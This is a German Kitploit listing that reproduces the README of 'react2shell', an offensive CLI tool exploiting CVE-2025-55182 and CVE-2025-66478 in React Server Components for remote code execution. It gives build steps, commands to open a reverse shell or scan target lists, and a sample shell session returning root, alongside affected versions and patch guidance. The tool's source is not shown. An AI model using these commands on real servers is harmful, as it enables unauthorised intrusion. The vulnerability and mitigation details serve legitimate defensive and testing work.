Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell — Ein CLI-Tool, das Sicherheitslücken in React Server Components und Server Actions (CVE-2025-55182, CVE-2025-66478) ausnutzt, um Remote-Code-Ausführung (RCE) auf verwundbaren Servern zu erreichen. | Kitploit
Tools/GitHubGitHub/mantvmass/react2shell
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolArchived
GitHubmantvmass/react2shell

react2shell

Ein CLI-Tool, das Sicherheitslücken in React Server Components und Server Actions (CVE-2025-55182, CVE-2025-66478) ausnutzt, um Remote-Code-Ausführung (RCE) auf verwundbaren Servern zu erreichen.

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell

Ein CLI-Tool zur Ausnutzung von Prototype-Pollution-Schwachstellen in React Server Components / Server Actions (CVE-2025-55182 & CVE-2025-66478), das Remote Code Execution (RCE) auf verwundbaren Servern ermöglicht.

Ursprünglicher PoC : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

WARNUNG: Dieses Tool zielt auf eine kritische Schwachstelle (CVSS 10.0) ab, die aktiv im Internet ausgenutzt wird. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für deren Test Sie eine ausdrückliche Genehmigung haben.

Rechtlicher Hinweis

Dieses Tool ist ausschließlich für Bildungszwecke, autorisierte Sicherheitstests, Penetrationstests mit Genehmigung und Schwachstellenforschung bestimmt.

Der Autor und die Mitwirkenden übernehmen keine Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung dieses Tools ergeben. Sie sind allein dafür verantwortlich, dass Ihre Nutzung allen geltenden Gesetzen, Vorschriften und Nutzungsbedingungen entspricht.

Die unbefugte Nutzung gegen Systeme ohne Erlaubnis ist in den meisten Rechtsordnungen illegal und kann zu schweren Strafen führen.

Installation

Aus dem Quellcode

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

Die Binärdatei befindet sich unter target/release/react2shell (bzw. react2shell.exe unter Windows).

Vorkompilierte Binärdateien

Laden Sie sie von der Releases-Seite herunter.

Verwendung

root@kitploit:~
react2shell [COMMAND] [SOURCE]

Befehle

  • open <URL>: Öffnet eine interaktive Reverse-Shell auf dem Ziel (sofern verwundbar).
  • scan <FILE>: Scannt eine Liste von Zielen aus einer Datei (eine URL pro Zeile) auf Schwachstellen.

Beispiele

root@kitploit:~
# Interaktive Shell öffnen
react2shell open http://vulnerable-target.com

# Mehrere Ziele scannen
react2shell scan targets.txt

# Einzelnes Ziel scannen
react2shell scan http://127.0.0.1:3000

Beispiele für die interaktive Shell

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # Display all supported commands
Commands;
  /new <URL> ; Switch URL target                           # Switch URL target
  /use exec ; Execute command and wait for output          # Switch to exec mode (waits for result)
  /use exec-no-wait ; Execute command without waiting      # Exec mode without waiting for output
  /use js ; Execute JavaScript code                        # Switch back to JavaScript mode
  /set timeout <ms> ; Set command timeout in milliseconds  # Configure command timeout
  /show options ; Show current configuration               # Display current shell settings
  /clear ; Clear screen                                    # Clear the terminal screen
  /exit or /quit ; Exit the shell                          # Exit the interactive shell

Examples;
  ls -la                                                 # Example Linux command
  whoami                                                 # Show current system user
  console.log('Hello')                                   # Example JavaScript command

[email protected]:3000 (js)
$ /use exec                                              # Switch from JS mode to exec mode
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # Verify current execution user
root                                                     # Command output

Betroffene Versionen

Next.js

Anwendungen, die React Server Components mit dem App Router verwenden, sind betroffen, wenn die folgenden Versionen ausgeführt werden:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 und spätere Canary-Releases

Die folgenden sind nicht betroffen:

  • Next.js 13.x
  • Next.js 14.x (stabile Releases)
  • Anwendungen, die den Pages Router verwenden
  • Edge-Runtime-Bereitstellungen

React

Die Schwachstelle besteht in React-Versionen 19.0, 19.1.0, 19.1.1 und 19.2.0 in den folgenden Paketen:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

Ein sofortiges Upgrade auf gepatchte Versionen wird dringend empfohlen, insbesondere für Produktionsumgebungen.

Abhilfe

Die primäre Behebung besteht darin, auf gepatchte Versionen von React und Next.js zu aktualisieren.

Für Next.js-Anwendungen verwenden Sie das offizielle automatisierte Reparaturtool:

root@kitploit:~
npx fix-react2shell-next

Weitere Informationen: vercel-labs/fix-react2shell-next

Siehe offizielle Sicherheitshinweise:

  • React: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js: https://nextjs.org/blog/CVE-2025-66478

Lizenz

Dieses Projekt wird ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung veröffentlicht. Die gesamte Verantwortung für die Nutzung liegt beim Endbenutzer.

Tool herunterladen